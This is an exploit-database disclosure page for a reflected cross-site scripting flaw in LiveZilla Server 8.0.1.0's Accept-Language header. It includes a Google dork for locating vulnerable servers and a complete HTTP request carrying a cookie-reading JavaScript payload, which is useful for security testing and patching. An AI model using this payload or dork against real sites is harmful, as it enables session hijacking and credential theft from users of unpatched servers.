header-logo
Suggest Exploit
vendor:
LiveZilla Server
by:
Clément Cruchet
6.1
CVSS
MEDIUM
Reflected XSS
79
CWE
Product Name: LiveZilla Server
Affected Version From: LiveZilla Server 8.0.1.0
Affected Version To: 8.0.1.0
Patch Exists: NO
Related CWE: CVE-2019-12962
CPE: a:livezilla:livezilla_server:8.0.1.0
Metasploit:
Other Scripts:
Tags: xss,edb,packetstorm,cve,cve2019,livezilla
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.html:LiveZilla', 'verified': True, 'vendor': 'livezilla', 'product': 'livezilla'}
Platforms Tested: Windows, Linux
2021

LiveZilla Server 8.0.1.0 – ‘Accept-Language’ Reflected XSS

The vulnerability allows an attacker to inject malicious code into the 'Accept-Language' header field, which is reflected back in the response. By crafting a specially crafted payload, an attacker can execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, credential theft, or other malicious activities.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input, particularly in HTTP header fields. Implementing appropriate input validation and output encoding techniques can help prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS
# Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla
# Date: 18 Mars 2021
# Exploit Author: Clément Cruchet
# Vendor Homepage: https://www.livezilla.net
# Software Link: https://www.livezilla.net/downloads/en/
# Version: LiveZilla Server 8.0.1.0 and before
# Tested on: Windows/Linux
# CVE : CVE-2019-12962

GET /mobile/index.php HTTP/1.1
Host: chat.website.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ';alert(document.cookie)//
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1